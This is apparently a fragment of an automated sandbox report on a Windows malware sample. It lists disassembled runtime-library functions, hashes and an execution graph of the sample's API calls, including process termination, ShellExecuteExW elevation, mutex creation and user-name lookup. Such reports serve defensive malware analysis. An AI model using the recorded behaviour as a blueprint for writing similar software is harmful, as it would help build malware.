                • std::exception::exception.LIBCMT ref: 00C7FC4D
                • __CxxThrowException@8.LIBCMT ref: 00C7FC62
                • std::regex_error::regex_error.LIBCPMT ref: 00C7FC74
                  • Part of subcall function 00C7F914: std::exception::exception.LIBCMT ref: 00C7F92E
                • __CxxThrowException@8.LIBCMT ref: 00C7FC82
                • std::exception::exception.LIBCMT ref: 00C7FC9B
                • __CxxThrowException@8.LIBCMT ref: 00C7FCB0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
                • String ID: leM
                • API String ID: 3569886845-2926266777
                • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                • Instruction ID: 05105be34a90e77bef16d5c54e4b89fc68c5a58cc0ea3b48cdc617bed0281ee0
                • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                • Instruction Fuzzy Hash: D511BC79C0020DBBCF00FFA5D495CDDBB7CEA04344B448566BD1597651EB74E3498B94
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _free_malloc_wprintf$_sprintf
                • String ID:
                • API String ID: 3721157643-0
                • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                • Instruction ID: 68ac79c62f0deb55317765078ad2da476e74437a99afab2342f5f6a2c66a22bc
                • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                • Instruction Fuzzy Hash: 9F1127BA9005503AC26162F90C17FFF3ADC9F46303F080469FE9CE1181EA585B49A3B5
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Exception@8Throw$_memset$_malloc_sprintf
                • String ID:
                • API String ID: 65388428-0
                • Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                • Instruction ID: a7dbcb0c42b9660be9e6c4763c2e80dcd0f12a4818fcd5ca57f58a7cb6c90fdb
                • Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                • Instruction Fuzzy Hash: 4E517B71D40219ABDB10DBA1DC86FEFBBB8FF08705F180025F905F6190EB746A059BA9
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Exception@8Throw$_memset_sprintf
                • String ID:
                • API String ID: 217217746-0
                • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                • Instruction ID: 2fce5fe622e7f8edae4dca5daf4aaba5ffbdbc84ce430e0caca41a91fd251b2e
                • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                • Instruction Fuzzy Hash: 3B517FB1D40209EADF11DFA1DC86FEFBBB8EB04705F240029F901B6191E775AA059BA4
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Exception@8Throw$_memset_sprintf
                • String ID:
                • API String ID: 217217746-0
                • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                • Instruction ID: a9140b41c96f041cca0a19a23c9d0e51bfa8923e987786e40d72f03194967124
                • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                • Instruction Fuzzy Hash: 67517171D40209AADF11DFA1DC46FEEBBB8FB08705F240129F915B7181E7746A068BA4
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
                • String ID:
                • API String ID: 3534693527-0
                • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                • Instruction ID: 543f2b2883c9bc28712ff1530dc298c6e6b6df810c3c2fb293381f860a4052f5
                • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                • Instruction Fuzzy Hash: 35314B36900325ABDB217B64CC02B6E7794AF45B65F10C015FD1CEB281DB748E84E7B5
                APIs
                • __getptd_noexit.LIBCMT ref: 00CF66DD
                  • Part of subcall function 00C559BF: __calloc_crt.LIBCMT ref: 00C559E2
                  • Part of subcall function 00C559BF: __initptd.LIBCMT ref: 00C55A04
                • __calloc_crt.LIBCMT ref: 00CF6700
                • __get_sys_err_msg.LIBCMT ref: 00CF671E
                • __invoke_watson.LIBCMT ref: 00CF673B
                • __get_sys_err_msg.LIBCMT ref: 00CF676D
                • __invoke_watson.LIBCMT ref: 00CF678B
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
                • String ID:
                • API String ID: 4066021419-0
                • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                • Instruction ID: 2f92721249bdecff73c69e9682e4e17874b6a02b30416acf02504cd215ed9eb8
                • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                • Instruction Fuzzy Hash: 8311273660161C6BEB653625DC02ABF738CDF00769F100027FF18D7202EA31EE8462DA
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _memset
                • String ID: D
                • API String ID: 2102423945-2746444292
                • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                • Instruction ID: 5dd11b87e07b6517f2fbe997db1affe92e6c730f48eff41cfc84663234ae858b
                • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                • Instruction Fuzzy Hash: 23E14C71D00219ABDF24DFA0DD8AFEEBBB8BF04704F144169F909A6190EB746A85CF54
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _memset
                • String ID: $$$(
                • API String ID: 2102423945-3551151888
                • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                • Instruction ID: fb305545567fda2eb160d2dc8323f0428a2b96cc665e11d673d0b4cc03f5757a
                • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                • Instruction Fuzzy Hash: DD91CE71C00218ABEF20CFA0DC49BEEBBB4BF05304F244168E41677281DBB25A89DB65
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _wcsnlen
                • String ID: U
                • API String ID: 3628947076-3372436214
                • Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                • Instruction ID: df59ec5e50d6590eda801efdf093c6c33af239eae0ee1667858294994dbf1867
                • Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                • Instruction Fuzzy Hash: 1E212B3A208608AEEB109BE49C55BBE73ACDB45352F600265FD18C7190FB71EEC8569C
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _memset
                • String ID: p2Q
                • API String ID: 2102423945-1521255505
                • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                • Instruction ID: 609fd2db12f0fe895ad28b1f60d75b62d42e592b161011ecf5e7febab3cceca0
                • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                • Instruction Fuzzy Hash: 96F0C96C698750A5F7217750BC26B857E916B31B09F104088E5182A2E5D3F9378CA79E
                APIs
                • std::exception::exception.LIBCMT ref: 00C7FBF1
                  • Part of subcall function 00C6169C: std::exception::_Copy_str.LIBCMT ref: 00C616B5
                • __CxxThrowException@8.LIBCMT ref: 00C7FC06
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
                • String ID: TeM$TeM
                • API String ID: 3662862379-3870166017
                • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                • Instruction ID: 88d707370c5df729e6d008a590f22c726dfcad4376fe2624e5952fe0c0b7e526
                • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                • Instruction Fuzzy Hash: 46D06779C0020DBBCB00EFA5D49ACDDBBB8AA04344B048466BD1597241EA74E3499BD4
                APIs
                  • Part of subcall function 00C5197D: __wfsopen.LIBCMT ref: 00C51988
                • _fgetws.LIBCMT ref: 00C3D15C
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: __wfsopen_fgetws
                • String ID:
                • API String ID: 853134316-0
                • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                • Instruction ID: 52c339c4e8963861bba06bc446c7d8802947a64c39ac9ec461243a8f62b2b466
                • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                • Instruction Fuzzy Hash: AD91F276D103199BCF20DFA4EC857AEB7F5BF00314F140129E826A3251E776AE58CB96
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _malloc$__except_handler4_fprintf
                • String ID:
                • API String ID: 1783060780-0
                • Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                • Instruction ID: df6777d0584785eaabd2c5d619528ebe233d402c3d42668b1499a4be31c73e89
                • Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                • Instruction Fuzzy Hash: E6A194B0C00248DBEF11EFD4DC4ABDEBBB5AF15309F140128E40677292D7765689DBA6
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                • String ID:
                • API String ID: 2974526305-0
                • Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                • Instruction ID: 2f477d36d4cac65942dfbdce82a566725d9a1310db73e8fc4f249fecfa01fe07
                • Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                • Instruction Fuzzy Hash: A251CA38A003059BDB248F69888456E77F5EF42322F148729FC36962D1D771AED8DB4C
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                • String ID:
                • API String ID: 3016257755-0
                • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                • Instruction ID: 46405aa361a163f0cead3558f4e2892c5c154a13ed7481ad030982f4ed5dfb13
                • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                • Instruction Fuzzy Hash: 0D01487644014ABBCF125E89DC02CEE3F66BB19351B588415FE6D58931D236CAB2BB81
                APIs
                • ___BuildCatchObject.LIBCMT ref: 00CF7A4B
                  • Part of subcall function 00CF8140: ___BuildCatchObjectHelper.LIBCMT ref: 00CF8172
                  • Part of subcall function 00CF8140: ___AdjustPointer.LIBCMT ref: 00CF8189
                • _UnwindNestedFrames.LIBCMT ref: 00CF7A62
                • ___FrameUnwindToState.LIBCMT ref: 00CF7A74
                • CallCatchBlock.LIBCMT ref: 00CF7A98
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                • String ID:
                • API String ID: 2901542994-0
                • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                • Instruction ID: d86636e2cf1da525bfbb1ef7cd75981f0ffd3afb00909c42fb32ef256289d2b7
                • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                • Instruction Fuzzy Hash: 6A01173200010DBBCF52AF55DC01EEE3FBAEF48754F158114FA1866121C732E961EBA1

                Execution Graph

                Execution Coverage:2%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:35.4%
                Total number of Nodes:806
                Total number of Limit Nodes:91
                execution_graph 43980 423f84 43981 423f90 _fgetws 43980->43981 44017 432603 GetStartupInfoW 43981->44017 43984 423f95 44019 4278d5 GetProcessHeap 43984->44019 43985 423fed 43986 423ff8 43985->43986 44349 42411a 58 API calls 3 library calls 43985->44349 44020 425141 43986->44020 43989 423ffe 43990 424009 __RTC_Initialize 43989->43990 44350 42411a 58 API calls 3 library calls 43989->44350 44041 428754 43990->44041 43993 424018 43994 424024 GetCommandLineW 43993->43994 44351 42411a 58 API calls 3 library calls 43993->44351 44060 43235f GetEnvironmentStringsW 43994->44060 43997 424023 43997->43994 44000 42403e 44001 424049 44000->44001 44352 427c2e 58 API calls 3 library calls 44000->44352 44070 4321a1 44001->44070 44005 42405a 44084 427c68 44005->44084 44008 424062 44009 42406d __wwincmdln 44008->44009 44354 427c2e 58 API calls 3 library calls 44008->44354 44090 419f90 44009->44090 44012 424081 44013 424090 44012->44013 44346 427f3d 44012->44346 44355 427c59 58 API calls _doexit 44013->44355 44016 424095 _fgetws 44018 432619 44017->44018 44018->43984 44019->43985 44356 427d6c 36 API calls 2 library calls 44020->44356 44022 425146 44357 428c48 InitializeCriticalSectionAndSpinCount __mtinitlocknum 44022->44357 44024 42514b 44025 42514f 44024->44025 44359 4324f7 TlsAlloc 44024->44359 44358 4251b7 61 API calls 2 library calls 44025->44358 44028 425154 44028->43989 44029 425161 44029->44025 44030 42516c 44029->44030 44360 428c96 44030->44360 44033 4251ae 44368 4251b7 61 API calls 2 library calls 44033->44368 44036 42518d 44036->44033 44038 425193 44036->44038 44037 4251b3 44037->43989 44367 42508e 58 API calls 4 library calls 44038->44367 44040 42519b GetCurrentThreadId 44040->43989 44042 428760 _fgetws 44041->44042 44380 428af7 44042->44380 44044 428767 44045 428c96 __calloc_crt 58 API calls 44044->44045 44046 428778 44045->44046 44047 4287e3 GetStartupInfoW 44046->44047 44049 428783 _fgetws @_EH4_CallFilterFunc@8 44046->44049 44048 428927 44047->44048 44055 4287f8 44047->44055 44050 4289ef 44048->44050 44053 428974 GetStdHandle 44048->44053 44054 428987 GetFileType 44048->44054 44388 43263e InitializeCriticalSectionAndSpinCount 44048->44388 44049->43993 44389 4289ff LeaveCriticalSection _doexit 44050->44389 44052 428c96 __calloc_crt 58 API calls 44052->44055 44053->44048 44054->44048 44055->44048 44055->44052 44057 428846 44055->44057 44056 42887a GetFileType 44056->44057 44057->44048 44057->44056 44387 43263e InitializeCriticalSectionAndSpinCount 44057->44387 44061 432370 44060->44061 44062 424034 44060->44062 44392 428cde 58 API calls 2 library calls 44061->44392 44066 431f64 GetModuleFileNameW 44062->44066 44064 4323ac FreeEnvironmentStringsW 44064->44062 44065 432396 ___check_float_string 44065->44064 44067 431f98 _wparse_cmdline 44066->44067 44069 431fd8 _wparse_cmdline 44067->44069 44393 428cde 58 API calls 2 library calls 44067->44393 44069->44000 44071 42404f 44070->44071 44072 4321ba __W_Gettnames_l 44070->44072 44071->44005 44353 427c2e 58 API calls 3 library calls 44071->44353 44073 428c96 __calloc_crt 58 API calls 44072->44073 44080 4321e3 __W_Gettnames_l 44073->44080 44074 43223a 44395 420bed 58 API calls 2 library calls 44074->44395 44076 428c96 __calloc_crt 58 API calls 44076->44080 44077 43225f 44396 420bed 58 API calls 2 library calls 44077->44396 44080->44071 44080->44074 44080->44076 44080->44077 44081 432276 44080->44081 44394 42962f 58 API calls _fgetws 44080->44394 44397 4242fd 8 API calls 2 library calls 44081->44397 44083 432282 44086 427c74 __IsNonwritableInCurrentImage 44084->44086 44398 43aeb5 44086->44398 44087 427c92 __initterm_e 44089 427cb1 _doexit __IsNonwritableInCurrentImage 44087->44089 44401 4219ac 67 API calls __cinit 44087->44401 44089->44008 44091 419fa0 __write_nolock 44090->44091 44402 40cf10 44091->44402 44093 419fb0 44094 419fc4 GetCurrentProcess GetLastError SetPriorityClass 44093->44094 44095 419fb4 44093->44095 44097 419fe4 GetLastError 44094->44097 44098 419fe6 44094->44098 44626 4124e0 109 API calls _memset 44095->44626 44097->44098 44416 41d3c0 44098->44416 44099 419fb9 44099->44012 44102 41a022 44419 41d340 44102->44419 44103 41b669 44725 44f23e 59 API calls 2 library calls 44103->44725 44105 41b673 44726 44f23e 59 API calls 2 library calls 44105->44726 44110 41a065 44424 413a90 44110->44424 44114 41a159 GetCommandLineW CommandLineToArgvW lstrcpyW 44116 41a33d GlobalFree 44114->44116 44130 41a196 44114->44130 44115 41a100 44115->44114 44117 41a354 44116->44117 44118 41a45c 44116->44118 44119 412220 76 API calls 44117->44119 44480 412220 44118->44480 44121 41a359 44119->44121 44123 41a466 44121->44123 44495 40ef50 44121->44495 44122 41a1cc lstrcmpW lstrcmpW 44122->44130 44123->44012 44125 41a24a lstrcpyW lstrcpyW lstrcmpW lstrcmpW 44125->44130 44126 420235 60 API calls ___get_qualified_locale 44126->44130 44127 41a48f 44129 41a4ef 44127->44129 44500 413ea0 44127->44500 44131 411cd0 92 API calls 44129->44131 44130->44116 44130->44122 44130->44125 44130->44126 44132 41a361 44130->44132 44133 41a563 44131->44133 44440 423c92 44132->44440 44167 41a5db 44133->44167 44521 414690 44133->44521 44136 41a395 OpenProcess 44137 41a402 44136->44137 44138 41a3a9 WaitForSingleObject CloseHandle 44136->44138 44443 411cd0 44137->44443 44138->44137 44141 41a3cb 44138->44141 44139 41a6f9 44628 411a10 8 API calls 44139->44628 44157 41a3e2 GlobalFree 44141->44157 44158 41a3d4 Sleep 44141->44158 44627 411ab0 PeekMessageW DispatchMessageW PeekMessageW 44141->44627 44142 41a6fe 44146 41a8b6 CreateMutexA 44142->44146 44147 41a70f 44142->44147 44143 41a5a9 44149 414690 59 API calls 44143->44149 44152 41a8ca 44146->44152 44151 41a7dc 44147->44151 44162 40ef50 58 API calls 44147->44162 44154 41a5d4 44149->44154 44150 41a40b GetCurrentProcess GetExitCodeProcess TerminateProcess CloseHandle 44155 41a451 44150->44155 44159 40ef50 58 API calls 44151->44159 44156 40ef50 58 API calls 44152->44156 44153 41a624 GetVersion 44153->44139 44160 41a632 lstrcpyW lstrcatW lstrcatW 44153->44160 44544 40d240 CoInitialize 44154->44544 44155->44012 44170 41a8da 44156->44170 44163 41a3f7 44157->44163 44158->44136 44164 41a7ec 44159->44164 44165 41a674 _memset 44160->44165 44172 41a72f 44162->44172 44163->44012 44166 41a7f1 lstrlenA 44164->44166 44169 41a6b4 ShellExecuteExW 44165->44169 44630 420c62 44166->44630 44167->44139 44167->44142 44167->44146 44167->44153 44169->44142 44191 41a6e3 44169->44191 44173 413ea0 59 API calls 44170->44173 44185 41a92f 44170->44185 44171 41a810 _memset 44175 41a81e MultiByteToWideChar lstrcatW 44171->44175 44174 413ea0 59 API calls 44172->44174 44177 41a780 44172->44177 44173->44170 44174->44172 44175->44166 44176 41a847 lstrlenW 44175->44176 44178 41a8a0 CreateMutexA 44176->44178 44179 41a856 44176->44179 44180 41a792 44177->44180 44181 41a79c CreateThread 44177->44181 44178->44152 44648 40e760 95 API calls 44179->44648 44629 413ff0 59 API calls ___check_float_string 44180->44629 44181->44151 44186 41a7d0 44181->44186 45030 41dbd0 95 API calls 4 library calls 44181->45030 44184 41a860 CreateThread WaitForSingleObject 44184->44178 45031 41e690 203 API calls 8 library calls 44184->45031 44649 415c10 44185->44649 44186->44151 44188 41a98c 44664 412840 60 API calls 44188->44664 44190 41a997 44665 410fc0 93 API calls 4 library calls 44190->44665 44191->44012 44193 41a9ab 44194 41a9c2 lstrlenA 44193->44194 44194->44191 44195 41a9d8 44194->44195 44196 415c10 59 API calls 44195->44196 44197 41aa23 44196->44197 44666 412840 60 API calls 44197->44666 44199 41aa2e lstrcpyA 44201 41aa4b 44199->44201 44202 415c10 59 API calls 44201->44202 44203 41aa90 44202->44203 44204 40ef50 58 API calls 44203->44204 44205 41aaa0 44204->44205 44206 413ea0 59 API calls 44205->44206 44207 41aaf5 44205->44207 44206->44205 44667 413ff0 59 API calls ___check_float_string 44207->44667 44209 41ab1d 44668 412900 44209->44668 44211 40ef50 58 API calls 44213 41abc5 44211->44213 44212 41ab28 _memmove 44212->44211 44214 413ea0 59 API calls 44213->44214 44215 41ac1e 44213->44215 44214->44213 44673 413ff0 59 API calls ___check_float_string 44215->44673 44217 41ac46 44218 412900 60 API calls 44217->44218 44220 41ac51 _memmove 44218->44220 44219 40ef50 58 API calls 44221 41acee 44219->44221 44220->44219 44222 413ea0 59 API calls 44221->44222 44223 41ad43 44221->44223 44222->44221 44674 413ff0 59 API calls ___check_float_string 44223->44674 44225 41ad6b 44226 412900 60 API calls 44225->44226 44229 41ad76 _memmove 44226->44229 44227 415c10 59 API calls 44228 41ae2a 44227->44228 44675 413580 59 API calls 44228->44675 44229->44227 44231 41ae3c 44232 415c10 59 API calls 44231->44232 44233 41ae76 44232->44233 44676 413580 59 API calls 44233->44676 44235 41ae82 44236 415c10 59 API calls 44235->44236 44237 41aebc 44236->44237 44677 413580 59 API calls 44237->44677 44239 41aec8 44240 415c10 59 API calls 44239->44240 44241 41af02 44240->44241 44678 413580 59 API calls 44241->44678 44243 41af0e 44244 415c10 59 API calls 44243->44244 44245 41af48 44244->44245 44679 413580 59 API calls 44245->44679 44247 41af54 44248 415c10 59 API calls 44247->44248 44249 41af8e 44248->44249 44680 413580 59 API calls 44249->44680 44251 41af9a 44252 415c10 59 API calls 44251->44252 44253 41afd4 44252->44253 44681 413580 59 API calls 44253->44681 44255 41afe0 44682 413100 59 API calls 44255->44682 44257 41b001 44683 413580 59 API calls 44257->44683 44259 41b025 44684 413100 59 API calls 44259->44684 44261 41b03c 44685 413580 59 API calls 44261->44685 44263 41b059 44686 413100 59 API calls 44263->44686 44265 41b070 44687 413580 59 API calls 44265->44687 44267 41b07c 44688 413100 59 API calls 44267->44688 44269 41b093 44689 413580 59 API calls 44269->44689 44271 41b09f 44690 413100 59 API calls 44271->44690 44273 41b0b6 44691 413580 59 API calls 44273->44691 44275 41b0c2 44692 413100 59 API calls 44275->44692 44277 41b0d9 44693 413580 59 API calls 44277->44693 44279 41b0e5 44694 413100 59 API calls 44279->44694 44281 41b0fc 44695 413580 59 API calls 44281->44695 44283 41b108 44285 41b130 44283->44285 44696 41cdd0 59 API calls 44283->44696 44286 40ef50 58 API calls 44285->44286 44287 41b16e 44286->44287 44289 41b1a5 GetUserNameW 44287->44289 44697 412de0 59 API calls 44287->44697 44290 41b1c9 44289->44290 44698 412c40 44290->44698 44292 41b1d8 44705 412bf0 59 API calls 44292->44705 44294 41b1ea 44706 40ecb0 60 API calls 2 library calls 44294->44706 44296 41b2f5 44709 4136c0 59 API calls 44296->44709 44298 41b308 44710 40ca70 59 API calls 44298->44710 44300 41b311 44711 4130b0 59 API calls 44300->44711 44302 412c40 59 API calls 44317 41b1f3 44302->44317 44303 41b322 44712 40c740 120 API calls 4 library calls 44303->44712 44305 412900 60 API calls 44305->44317 44306 41b327 44713 4111c0 169 API calls 2 library calls 44306->44713 44309 41b33b 44714 41ba10 LoadCursorW RegisterClassExW 44309->44714 44311 41b343 44715 41ba80 CreateWindowExW ShowWindow UpdateWindow 44311->44715 44313 413100 59 API calls 44313->44317 44314 41b34b 44318 41b34f 44314->44318 44716 410a50 65 API calls 44314->44716 44317->44296 44317->44302 44317->44305 44317->44313 44707 413580 59 API calls 44317->44707 44708 40f1f0 59 API calls 44317->44708 44318->44191 44319 41b379 44717 413100 59 API calls 44319->44717 44321 41b3a5 44718 413580 59 API calls 44321->44718 44323 41b48b 44724 41fdc0 CreateThread 44323->44724 44325 41b49f GetMessageW 44326 41b4ed 44325->44326 44327 41b4bf 44325->44327 44328 41b502 PostThreadMessageW 44326->44328 44329 41b55b 44326->44329 44330 41b4c5 TranslateMessage DispatchMessageW GetMessageW 44327->44330 44332 41b510 PeekMessageW 44328->44332 44333 41b564 PostThreadMessageW 44329->44333 44334 41b5bb 44329->44334 44330->44326 44330->44330 44335 41b546 WaitForSingleObject 44332->44335 44336 41b526 DispatchMessageW PeekMessageW 44332->44336 44337 41b570 PeekMessageW 44333->44337 44334->44318 44340 41b5d2 CloseHandle 44334->44340 44335->44329 44335->44332 44336->44335 44336->44336 44338 41b5a6 WaitForSingleObject 44337->44338 44339 41b586 DispatchMessageW PeekMessageW 44337->44339 44338->44334 44338->44337 44339->44338 44339->44339 44340->44318 44345 41b3b3 44345->44323 44719 41c330 59 API calls 44345->44719 44720 41c240 59 API calls 44345->44720 44721 41b8b0 59 API calls 44345->44721 44722 413260 59 API calls 44345->44722 44723 41fa10 CreateThread 44345->44723 45032 427e0e 44346->45032 44348 427f4c 44348->44013 44349->43986 44350->43990 44351->43997 44355->44016 44356->44022 44357->44024 44358->44028 44359->44029 44361 428c9d 44360->44361 44363 425179 44361->44363 44365 428cbb 44361->44365 44369 43b813 44361->44369 44363->44033 44366 432553 TlsSetValue 44363->44366 44365->44361 44365->44363 44377 4329c9 Sleep 44365->44377 44366->44036 44367->44040 44368->44037 44370 43b81e 44369->44370 44373 43b839 44369->44373 44371 43b82a 44370->44371 44370->44373 44378 425208 58 API calls __getptd_noexit 44371->44378 44372 43b849 HeapAlloc 44372->44373 44375 43b82f 44372->44375 44373->44372 44373->44375 44379 42793d DecodePointer 44373->44379 44375->44361 44377->44365 44378->44375 44379->44373 44381 428b1b EnterCriticalSection 44380->44381 44382 428b08 44380->44382 44381->44044 44390 428b9f 58 API calls 8 library calls 44382->44390 44384 428b0e 44384->44381 44391 427c2e 